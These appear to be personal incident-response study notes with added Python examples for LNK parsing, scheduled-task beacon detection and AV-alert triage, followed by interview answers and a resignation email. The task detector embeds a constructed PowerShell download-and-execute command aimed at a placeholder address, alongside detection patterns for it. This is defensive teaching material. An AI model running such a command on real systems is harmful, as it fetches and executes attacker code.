Detection & Analysis


Many possible sources for detecting an incident
Network device (e.g. firewall, IDS, IPS)
Host logs (e.g. sysmon, WinEVT)
Admins and users noticing something isn't right
Threat intelligence feeds
Third party notifications
The first decision is always verification
Do you have an incident, or is it a false positive?
Sometimes easy, such as a website defacement
Sometimes difficult, requiring a full forensic examination
These are the data sources that we need to have when it comes to our detection and
analysis. We capture this data, but where do the data sources come from? We can get
them from different network devices, could be firewall, IPS, IDS, switch, even
router, and from the host logs through Sysmon and WinEVT, the default one. You
cannot just investigate without the logs themselves; these are what we call data
sources. And of course we need to have some threat intelligence feeds as well. Let's
say this IP address was used in ransomware that happened last month; then suddenly
you have an idea this might be the same scenario, this must be the same case, or
it might be the same threat actors attacking our system that just deployed
ransomware last month on our competitor. You notice a lot of ransomware artifacts
and then you might be thinking this could possibly be ransomware, but after
spending a couple of hours dealing with the data that you just acquired, suddenly
you notice that this is more than ransomware: this is an active campaign involving
ransomware, webshells and different things.

Time to do the real deal. Once an incident is declared:

Assign the incident handler / lead
Collect data from key NSM/CSM data sources
Understand who owns the asset and what it does
Identify any compliance and/or safety issues
Categorize the incident
Begin remote live-box investigation if required
So you need to contact some entities; you need to contact your manager, like: hey
manager, there's an incident and we are deploying our IR now to investigate further
and to perform containment and eradication, and this incident is categorized as P1
because the attacker was able to get some data already and we need to stop them as
soon as possible. So it's about time to do the containment.

Containment Procedure - Stop the bleeding phase

You try to stop the bleeding: you want to stop the impact and minimize the risk of
the incident, like isolation of VLANs. Let's say the compromised machine is coming
from HR; you just need to isolate it or reroute it into your test VLAN. Or you can
block some specific IP addresses, for example you can see that there are some
Russian or North Korean IPs connecting to our system today and these are the IP
addresses used to attack our system, or block the whole region, like for any
Russian and North Korean IP automatically block it because we don't have any
business with them at all. You can also block ports; to my surprise a lot of
attackers are still using uncommon ports, so you can also block those ports. And if
you have an EDR platform in your company you can block some hashes and some
applications and binaries if the attackers are using them.
We can also perform short term containment and long term containment. If you are
dealing with incidents we are not just waiting for the evidence; by looking into
the first content of the incident, let's say IT says they are being attacked by
ransomware but they need to wait a while before they get the logs because it's like
international shipping, or maybe they cannot do remote uploading of artifacts, what
you could do there is perform a short term containment: here are the steps that you
can perform as remediation so you won't infect the other systems. Or maybe you can
help the IT folks go to their EDR platform and perform some triage activities and
look at what is patient zero, when this incident started, and which infected
machines are related, so at least you are making your time worth it, not just
waiting for the logs to be shipped to you.

Triage Acquisition: "Quick WIN Forensics" using Live Response Collection/KAPE


We will perform this to get security artifacts that will make our investigation
more faster, we will not wait for the full disk image of the entire hard drive to
be finished before starting the investigation.
Your manager says that a confidential file was accessed by an unknown employee and
they suspect George. Tell me whether he really accessed the confidential file from
his machine, and when. Only two questions need answering, so are we going to take
a full disk image of the entire hard drive? No! As an IR, I will perform triage
acquisition ("Quick Win Forensics") using Live Response Collection/KAPE.
Who was the employee that accessed the confidential file?
I can check the Prefetch files: maybe he executed WinWord or a PDF reader, because
that is the file format. Prefetch is the Windows artifact that records program
executions on the endpoint (last run times and run count); note that it is
disabled by default on Windows Server editions.
I can look at the LNK files and Jump Lists on George's machine (under
%AppData%\Microsoft\Windows\Recent), because there I would see which files the
user recently opened. The creation time of the .lnk file itself is the first time
the document was opened and its modification time is the last time; the timestamps
embedded inside the LNK describe the target file, not the access.
If he really accessed the file, I would also check the Master File Table ($MFT) to
confirm the file's timestamps, and the Security event log logon events (4624) to
confirm it was George's account that was logged on, because maybe it is George's
machine but not his credentials.
Artifacts to collect: Security logs, application logs, all of the Windows event
logs, Jump Lists, registry hives, Prefetch, browser history, LNK files, Master File
Table, file system, emails, ShellBags, etc.
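As an added example (my code, not from these notes or from KAPE), here is a small Python parser for the .lnk files that answer the "which file, and when" question above. It reads the ShellLinkHeader and the LinkInfo block to pull out the target path, the volume serial and the target's timestamps. The sample .lnk is built inside the script so it runs offline; the path, volume label, serial number and times in it are made up.

```python
"""Pull target path and timestamps out of a Windows shell link (.lnk).

Added example for the triage case above; it is not code from these notes
or from KAPE. The sample .lnk is built by build_sample_lnk() so the script
runs offline: the path, volume label, serial number and times are made up.
"""
import struct
from datetime import datetime, timedelta, timezone

EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-0046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData sections appear in this order when their LinkFlags bit is set
STRING_FIELDS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location")]
HEADER_FMT = "<I16sIIQQQIIIHHII"  # ShellLinkHeader, 76 bytes (MS-SHLLINK 2.1)


def filetime_to_datetime(ft):
    """FILETIME (100 ns ticks since 1601-01-01 UTC) -> aware datetime; None if 0."""
    return None if ft == 0 else EPOCH_1601 + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    d = dt - EPOCH_1601  # integer math: float seconds lose precision at 1e17 ticks
    return ((d.days * 86400 + d.seconds) * 1_000_000 + d.microseconds) * 10


def _cstring(data, off):
    return data[off:data.index(b"\x00", off)].decode("cp1252")


def parse_lnk(data):
    hdr = struct.unpack_from(HEADER_FMT, data, 0)
    size, clsid, flags, attrs, ctime, atime, wtime, fsize = hdr[:8]
    if size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a shell link file")
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:  # skip the IDList; LinkInfo is easier to read
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    info = {"local_base_path": None, "volume_serial": None}
    if flags & HAS_LINK_INFO:
        li_size, _hdr, li_flags, vol_off, lbp_off, _cnrl, _cps = \
            struct.unpack_from("<IIIIIII", data, pos)
        if li_flags & 0x01:  # VolumeIDAndLocalBasePath
            _vsize, _dtype, serial, _label_off = struct.unpack_from("<IIII", data, pos + vol_off)
            info["volume_serial"] = serial
            info["local_base_path"] = _cstring(data, pos + lbp_off)
        pos += li_size
    for bit, name in STRING_FIELDS:  # CountCharacters then the characters, no terminator
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            if flags & IS_UNICODE:
                info[name] = data[pos:pos + 2 * count].decode("utf-16-le")
                pos += 2 * count
            else:
                info[name] = data[pos:pos + count].decode("cp1252")
                pos += count
    info.update(target_created=filetime_to_datetime(ctime),
                target_accessed=filetime_to_datetime(atime),
                target_modified=filetime_to_datetime(wtime),
                target_size=fsize, file_attributes=attrs)
    return info


def build_sample_lnk(target_path, created, accessed, modified, serial=0x1A2B3C4D):
    """Constructed test input: a minimal .lnk carrying only a LinkInfo block."""
    header = struct.pack(HEADER_FMT, 0x4C, LNK_CLSID, HAS_LINK_INFO, 0x20,
                         datetime_to_filetime(created), datetime_to_filetime(accessed),
                         datetime_to_filetime(modified), 4096, 0, 1, 0, 0, 0, 0)
    label = b"OSDISK\x00"
    volume_id = struct.pack("<IIII", 16 + len(label), 3, serial, 16) + label  # DRIVE_FIXED
    local = target_path.encode("cp1252") + b"\x00"
    vol_off = 28  # LinkInfoHeaderSize 0x1C: no Unicode offset fields follow
    lbp_off = vol_off + len(volume_id)
    cps_off = lbp_off + len(local)  # empty CommonPathSuffix
    link_info = struct.pack("<IIIIIII", cps_off + 1, 28, 0x01, vol_off, lbp_off, 0, cps_off)
    return header + link_info + volume_id + local + b"\x00"


SAMPLE_LNK = build_sample_lnk(
    r"C:\Users\george\Documents\Confidential.docx",
    datetime(2024, 3, 1, 8, 0, tzinfo=timezone.utc),
    datetime(2024, 3, 4, 14, 32, 10, tzinfo=timezone.utc),
    datetime(2024, 3, 3, 17, 5, tzinfo=timezone.utc))

if __name__ == "__main__":
    for key, value in parse_lnk(SAMPLE_LNK).items():
        print(f"{key:>16}: {value}")
```

Run it over C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Recent\*.lnk from the triage collection. The three timestamps inside the LNK belong to the target document; the time the user opened it is the creation (first open) and modification (last open) time of the .lnk file itself, which comes from the file system or the $MFT, so collect both and compare them.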
Core Sources of Evidence (items such as running processes, network connections and
the DNS cache are volatile and must be captured live; the rest is non-volatile)
Network Information, Startup Applications, Running Process Related Information
Open Shares, Mapped Drives, Scheduled Tasks, DNS Cache, File Timeline
Windows Services, Persistence Mechanisms, Artifacts of Execution
File System Metadata, Windows Registry, Windows Event Logs
Typed URLs, Audit Policy, USB Related, Firewall Configuration
Drivers Installed and Running, DLLs Created, Opened Files

Eradication Procedure - Full removal of the attacker's remnants and artifacts from
the environment.
Eradication is about removing the artifacts: the malware, the processes, and any
files they dropped in %TEMP%, %APPDATA%, %PUBLIC% or the Downloads folder, which are
the directories malware favors. If there is persistence, say a scheduled task that
keeps running every 15 minutes and connects back to the attacker's C2, the
eradication phase is where we delete it so they do not get access all over again;
check every persistence mechanism (scheduled tasks, services, Run keys, WMI
subscriptions, added accounts), because removing only the binary leaves them a way
back in. It is also the time to scan the whole environment for signs of a wider
outbreak, and to patch the root cause during eradication, for example a
vulnerability on our Microsoft Exchange server.
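To make the persistence check concrete, here is an added Python example (mine, not from these notes) that reads the XML that Task Scheduler stores under C:\Windows\System32\Tasks and flags tasks that repeat at beacon-like intervals, hide their window, run encoded PowerShell or fetch something from the network. Both task definitions, the 30-minute threshold and the address 203.0.113.10 are constructed for the example.

```python
"""Flag beacon-like scheduled tasks from their Task Scheduler XML.

Added example for the eradication notes above; not part of the original
notes. The two task definitions below are constructed inline and the C2
URL, paths and times are invented.
"""
import base64
import re
import xml.etree.ElementTree as ET
from datetime import timedelta

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
BEACON_THRESHOLD = timedelta(minutes=30)  # assumption: faster repeats look like beaconing

# (regex, finding) applied to the Exec command line and to any decoded -EncodedCommand
SUSPICIOUS = [
    (r"(?i)\bIEX\b|Invoke-Expression", "inline script execution"),
    (r"(?i)-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"(?i)DownloadString|Net\.WebClient|Invoke-WebRequest|https?://", "network download"),
    (r"(?i)\\(?:Temp|AppData|Public|Downloads)\\", "payload in user-writable directory"),
]


def parse_iso_duration(text):
    """ISO-8601 durations as Task Scheduler writes them, e.g. PT15M, PT1H, P1D."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", text or "")
    if not m:
        return None
    d, h, mi, s = (int(g) if g else 0 for g in m.groups())
    return timedelta(days=d, hours=h, minutes=mi, seconds=s)


def decode_encoded_command(args):
    """Return the script hidden behind -e/-ec/-enc/-EncodedCommand, or ''."""
    m = re.search(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", args)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def assess_task(xml_text):
    root = ET.fromstring(xml_text)
    findings = []
    intervals = [parse_iso_duration(el.text)
                 for el in root.iterfind("t:Triggers/*/t:Repetition/t:Interval", NS)]
    intervals = [i for i in intervals if i is not None]
    if intervals and min(intervals) <= BEACON_THRESHOLD:
        findings.append(f"repeats every {min(intervals)}")
    for ex in root.iterfind("t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS).strip()
        args = ex.findtext("t:Arguments", default="", namespaces=NS).strip()
        decoded = decode_encoded_command(args)
        if decoded:
            findings.append("encoded PowerShell command")
        for pattern, why in SUSPICIOUS:
            if re.search(pattern, f"{cmd} {args}") or re.search(pattern, decoded):
                findings.append(why)
    if root.findtext("t:Principals/t:Principal/t:UserId", default="", namespaces=NS) == "S-1-5-18":
        findings.append("runs as SYSTEM")
    return {"findings": findings, "verdict": "review" if len(findings) >= 2 else "ok"}


# Constructed samples: one beaconing task and one ordinary backup job.
SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/up.ps1')"
ENCODED = base64.b64encode(SCRIPT.encode("utf-16-le")).decode()

MALICIOUS_TASK = f"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger>
    <Repetition><Interval>PT15M</Interval></Repetition>
    <StartBoundary>2024-03-04T14:40:00</StartBoundary>
  </TimeTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId></Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>powershell.exe</Command>
    <Arguments>-nop -w hidden -enc {ENCODED}</Arguments>
  </Exec></Actions>
</Task>"""

BENIGN_TASK = """<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger>
    <StartBoundary>2024-01-01T02:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
  </CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId></Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>C:\\Program Files\\BackupCo\\backup.exe</Command>
    <Arguments>--full --quiet</Arguments>
  </Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for label, xml_text in (("malicious", MALICIOUS_TASK), ("benign", BENIGN_TASK)):
        print(label, assess_task(xml_text))
```

For real task files use ET.parse() on the file (they are UTF-16 with a BOM, which the parser handles). Tasks that come back as "review" are the ones to export, record the command line and URL as IOCs, and then delete during eradication.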

Recovery Procedure
Recovery is rebuilding the server, or re-imaging the infected machine from a
verified backup, and restoring the software and data. The thing I see from the SOC
standpoint is that people put the server back into production without asking the
business owner. For example, you contained a specific server and there is no
approval from the business owner: you have to ask them whether their applications
are running, maybe they run an SAP system or some ERP system, and suddenly you
rebuild this server, put it back into production, and it does not work on their
end. Then we are dealing with a loss of confidence in the security team. My
suggestion: create a template in which you ask the business owner before you put
the server back into production, and test that every application really works
before you close the ticket and declare the recovery stage done.

Post-Incident Activity, which is super important
This is the stage where you realize "oh, I missed something there": we do not have
detection for credential abuse, or when someone performs lateral movement we are
missing detection and I have no visibility on it, so next time I will write
detection engineering logic that identifies someone moving from one place to
another. That is the beauty of post-incident activity. You can also discuss the
vulnerability management approach, because the attacker was able to get into the
system through a vulnerable web app and, by leveraging it, dropped a web shell.
Let's say my post-incident activity states that we will have scheduled
vulnerability scanning and vulnerability management, that we have to catch the
critical ones, and that we perform change management with CAB approval following
the ITIL process framework. It is the lessons-learned meeting that needs to take
place whenever there is an incident.

1. What tools can you use to get static information about a PE file?
CFF Explorer, PEStudio, capa, Sysinternals Suite (for example Sigcheck and Strings).

2. How would you analyze a packet capture? Do you use any tools for that?
Wireshark, BruteShark, TShark, tcpdump, NetworkMiner, Moloch (now called Arkime).

3. Do you normally upload sample files to VT or HA to get an immediate result? What
can you do if you are not allowed to upload files to these public repositories?
No. For OPSEC reasons we do not upload any sample file coming from our internal
network: it might contain sensitive information about our organization, and a
targeted sample uploaded to a public service tells the attacker that we found it.
What we can do is collect the file's metadata, especially its hash value, and run
a hash search on VT or HA, which exposes nothing if the sample is unknown there.
If the file really has to be detonated, use a private sandbox instead.

4. How do you classify low-impact malware versus high-impact malware?
We can use the Antivirus Event Analysis Cheat Sheet created by Florian Roth. It
depends on the alert signature as well as the location. If something is running
from a flash drive, I might say it is just people inserting their drives, and I
do not know whether the flash drive contains their personal files. But what if the
alert is coming from the domain controller, do you really need to prioritize that?
Of course, yes. What if the malware is residing in C:\Windows\System32, which is a
restricted folder: not everyone can put a binary in that folder unless it is
approved software, so what if there is malware in there? Do you prioritize that, or
do you just wait for the SLA to run out? The cheat sheet is very useful for that.
Other signals worth weighing: the detection name (HackTool, Mimikatz or web shell
versus PUA or adware), whether the AV actually cleaned the file or only detected
it, the account it ran under, and whether the same signature is firing on many
hosts at once.
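An added Python example of that prioritization logic (my own scoring, not the cheat sheet itself): each alert is weighted by host role, signature family, drop location, whether the AV actually cleaned it, the account context, and whether the same signature is firing across several hosts. All weights are assumptions, and the six events are constructed (hosts, users, paths and signature names are made up).

```python
"""Rank antivirus alerts by likely impact before working them.

Added example for the classification notes above; it is not the cheat
sheet itself, only a scoring scheme in its spirit. The weights are my own
assumptions and the alert events are constructed: hosts, users, paths and
signature names are made up.
"""
import re

ROLE_WEIGHTS = {"dc": 40, "exchange": 30, "web": 25, "file": 20, "workstation": 0}
PRIVILEGED_ACCOUNTS = {"SYSTEM", "Administrator"}
CLEANED_ACTIONS = {"quarantined", "blocked", "removed"}

# First matching entry in each list wins: (regex, weight, reason)
SIGNATURE_WEIGHTS = [
    (r"(?i)mimikatz|cobalt|meterpreter|beacon|hacktool|webshell", 40, "offensive tooling"),
    (r"(?i)ransom|wiper", 40, "destructive payload"),
    (r"(?i)trojan|backdoor|dropper|loader", 25, "backdoor or loader"),
    (r"(?i)\bPUA\b|adware|toolbar|keygen", -10, "low-risk PUA"),
]
LOCATION_WEIGHTS = [
    (r"(?i)^[a-z]:\\windows\\(system32|syswow64)\\[^\\]+$", 30, "dropped directly in System32"),
    (r"(?i)\\inetpub\\|\\wwwroot\\", 35, "web root (possible web shell)"),
    (r"(?i)\\(temp|appdata|public|downloads|programdata)\\", 15, "user-writable staging directory"),
]


def score_event(ev, hosts_with_same_signature=1):
    """Return (score, reasons) for one AV event dict."""
    score, reasons = 0, []
    if ev["role"] != "workstation":
        score += ROLE_WEIGHTS.get(ev["role"], 0)
        reasons.append(f"{ev['role']} host")
    for pattern, weight, why in SIGNATURE_WEIGHTS:
        if re.search(pattern, ev["signature"]):
            score += weight
            reasons.append(why)
            break
    for pattern, weight, why in LOCATION_WEIGHTS:
        if re.search(pattern, ev["path"]):
            score += weight
            reasons.append(why)
            break
    if ev.get("removable"):  # USB stick: usually personal files, not an intrusion
        score -= 15
        reasons.append("removable media")
    if ev["action"] not in CLEANED_ACTIONS:  # detected but still on disk
        score += 25
        reasons.append(f"not cleaned (action={ev['action']})")
    if ev["user"] in PRIVILEGED_ACCOUNTS:
        score += 10
        reasons.append("privileged context")
    if hosts_with_same_signature >= 3:
        score += 20
        reasons.append(f"same signature on {hosts_with_same_signature} hosts")
    return max(score, 0), reasons


def severity(score):
    if score >= 80:
        return "critical"
    if score >= 50:
        return "high"
    return "medium" if score >= 25 else "low"


def triage(events):
    """Score every event and return them highest-impact first."""
    hosts_per_signature = {}
    for ev in events:
        hosts_per_signature.setdefault(ev["signature"], set()).add(ev["host"])
    ranked = []
    for ev in events:
        score, reasons = score_event(ev, len(hosts_per_signature[ev["signature"]]))
        ranked.append({**ev, "score": score, "severity": severity(score), "reasons": reasons})
    return sorted(ranked, key=lambda r: r["score"], reverse=True)


def _event(host, role, user, path, signature, action, removable=False):
    return dict(host=host, role=role, user=user, path=path,
                signature=signature, action=action, removable=removable)


# Constructed sample alerts
SAMPLE_EVENTS = [
    _event("WS-0042", "workstation", "jdoe", r"E:\photos\setup.exe",
           "PUA:Win32/Toolbar", "quarantined", removable=True),
    _event("DC01", "dc", "SYSTEM", r"C:\Windows\System32\svchosts.exe",
           "HackTool:Win32/Mimikatz", "detected"),
    _event("WEB01", "web", r"IIS APPPOOL\DefaultAppPool",
           r"C:\inetpub\wwwroot\uploads\img.aspx", "Backdoor:ASP/WebShell.A", "detected"),
] + [
    _event(host, "workstation", user, rf"C:\Users\{user}\AppData\Local\Temp\invoice.exe",
           "Trojan:Win32/Dropper.B", "quarantined")
    for host, user in (("WS-0101", "alice"), ("WS-0102", "bob"), ("WS-0103", "carol"))
]

if __name__ == "__main__":
    for row in triage(SAMPLE_EVENTS):
        print(f"{row['severity']:>8} {row['score']:>4}  {row['host']:<8} {'; '.join(row['reasons'])}")
```

The flash-drive PUA sinks to the bottom, the Mimikatz hit on the domain controller that the AV only "detected" comes out on top, and the three identical workstation droppers are lifted to "high" because the same signature on three hosts at once is an outbreak, not a one-off.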

5. What are the common folders where malware resides?
%TEMP%, %APPDATA%, %PUBLIC%, the user's Downloads and Desktop folders, the Recycle
Bin ($Recycle.Bin) and WinSxS.
WinSxS (Windows Side-by-Side) stores multiple copies of DLLs, EXEs and other system
files so that multiple applications can run on Windows without compatibility
problems.
Since some malware runs only in memory because of fileless attacks, it sometimes
hides a copy of the payload inside the Recycle Bin.

Registry Hives and their backing files (the system hives live in
%SystemRoot%\System32\config; NTUSER.DAT sits in each user's profile folder)
HKEY_CURRENT_CONFIG          System, System.alt, System.log, System.sav
HKEY_CURRENT_USER            Ntuser.dat, Ntuser.dat.log
HKEY_LOCAL_MACHINE\SAM       Sam, Sam.log, Sam.sav
HKEY_LOCAL_MACHINE\Security  Security, Security.log, Security.sav
HKEY_LOCAL_MACHINE\Software  Software, Software.log, Software.sav
HKEY_LOCAL_MACHINE\System    System, System.alt, System.log, System.sav
HKEY_USERS\.DEFAULT          Default, Default.log, Default.sav

1. On a Windows system, in which directory are the event logs stored?
On Windows Vista and later (Windows 8, 10 and 11, and the matching Server
releases) the event logs are stored as .evtx files in
C:\Windows\System32\winevt\Logs. On Windows XP they were .evt files (AppEvent.Evt,
SecEvent.Evt, SysEvent.Evt) in C:\Windows\System32\config, alongside the registry
hives.

2. Phase of the Cyber Kill Chain in which the adversary enumerates employees,
services, etc.?
Reconnaissance.

3. Stage of Incident Response in which the full clean-up and removal of the cause
of the incident occurs?
Eradication.

4. During an incident, immediately shut down the infected system and disconnect it
from the network? True or False?
False. If we shut the machine down there is very little chance of recovering the
volatile data (running processes, network connections, injected code). Isolate it
from the network instead, for example with EDR network containment or by pulling
the cable, and capture a memory dump first so we can investigate it properly.

5. In IR, it is the process of restoring affected systems back to normal
operations.
This is what we call Recovery.

6. This is the type of analysis that focuses on the least frequent occurrences. It
allows analysis of large amounts of data without drowning in them. Long Tail
Analysis.

7. How do you stay up to date with the latest infosec developments related to IR?
Twitter, and TweetDeck, which carries a lot of feeds on vulnerability assessment,
threat intelligence, malware analysis, digital forensics, cyber defense, threat
hunting, penetration testing and more. The DFIR Report, Krebs on Security, Hacker
News, SANS.edu.

Until it is my turn, I will keep clapping for others happily.


I feel that if I will be a successful candidate for this position, you will quickly
see a positive return on your investment.
I am very trainable and flexible with any work schedules and office locations.

Do you have any questions for us?
How would you describe the company's culture?
How has the role evolved over the years?
How do you see the company evolving over the next 5 to 10 years?
What advice would you give to the successful candidate who wants to excel in the
role?
What would you need me to focus on in the first 30 days of starting?

Why do you want to leave your current job?
I simply want to leave my current job because I feel I have reached my full
potential in the role. My employer has been amazing and we have achieved lots of
great things together, but I am now ready for a fresh challenge. I will leave my
employer on really good terms. I am ready for a fresh challenge where I can put all
the skills and qualities that I have developed to good use and, at the same time,
learn some new ones.

Where do you see yourself in 5 years' time?
Well, I certainly see myself, hopefully, still working for your organization,
either in the same role or perhaps having advanced to a more senior level if you
see me as a fit for the organization. I would also see myself fully trained up,
having progressed by developing different skills and qualities in the role, and
having undertaken lots of training courses to help me continue to contribute
positively to the team. Finally, in 5 years' time I would hope to be seen as a
trustworthy member of the organization and someone who could perhaps help train up
new members of staff as they join the business.

Describe yourself in 3 words?
The three words I would use to describe myself are results-oriented, evolving and
energetic. I am results-oriented because I will come into this role and not just
carry out my normal day-to-day duties; I will actually strive to add value to your
company and achieve results time and time again. I am somebody who is evolving:
what I mean by that is I want to grow with your company as it progresses. I have
my own personal goals outside of work and I know that I will only achieve those if
I perform really well within my job, so I will progress as your company grows.
Finally, I would say that I am energetic. I believe I have a positive nature, I
always view things positively, and I believe that energetic enthusiasm always rubs
off positively on other team members.

Why should we hire you?
I believe you should hire me for 5 reasons. The first reason is that I already
have the necessary experience to match the job description. The second reason is
that I have the necessary skills, qualities and attributes to come into the role
and learn the position quickly. The third reason why I believe you should hire me
is that I am the type of person who will always embrace change positively, and I
understand that for a company to succeed it needs to continually change to meet
the expectations of its customers and its clients. The fourth reason why you
should hire me is that I will always take responsibility for my own ongoing
professional development, so I stay at the cutting edge of what is required for
the role. And finally, reason number five: I believe that if you do hire me, you
will quickly see a positive return on your investment.

What is your biggest weakness?
I am aware of my weaknesses. My biggest weakness is the fact that I find it really
difficult to say no to people. In the past, this has meant that I sometimes took on
too much work and became overwhelmed. I need to learn to be more mindful in
situations like this, so when somebody else needs my help I will always analyze my
current workload to see whether I really have the capacity to take on the extra
work.

Resignation - Christan George V. Senarillos

Hi Sir Joelle,

As I compose this email, every strike on keys feels like a stab in my heart.
This is one of the toughest and saddening decisions I ever had to make.
I am resigning from my post as a Tier 3 Network Security Analyst of the most
hardworking team I ever had the opportunity of being a part of... the MSOC.

It is nothing more than a career move. Everything else here in Masergy is superb.
I couldn't have asked for more supportive and/or trusting superiors than yourself.
We couldn't have picked the perfect mix of individuals here in MSOC. The synergy
amongst all of them is always visible.

Salary-wise, I am actually quite pleased with what I am receiving. I couldn't thank
you enough for appreciating my work by putting a bump on it. Although it is not yet
in effect, your effort and recognition are what mattered the most to me.

I am moving into a role as a Senior Threat Detection and Response Consultant at
Ernst & Young, and I am going to lead another team of SOC analysts, the same way I
did here. The magnitude of work and responsibility is immense. I guess I am a
glutton for punishment. Somehow similar to the reason why I moved here, I was up
for the challenge of trying to improve the overall state of MSOC back then.

I hope I was able to deliver what was expected of me.

Thank you very much, Sir Joelle. You have always been so kind, helpful and
supportive.

Sometimes Pass (1.00) Most of the Time Fail (0.00) - Cutting Classes, Coin
Flipping, Billiards, Dota, Mixed Martial Arts, Food Trip, Social Drinking
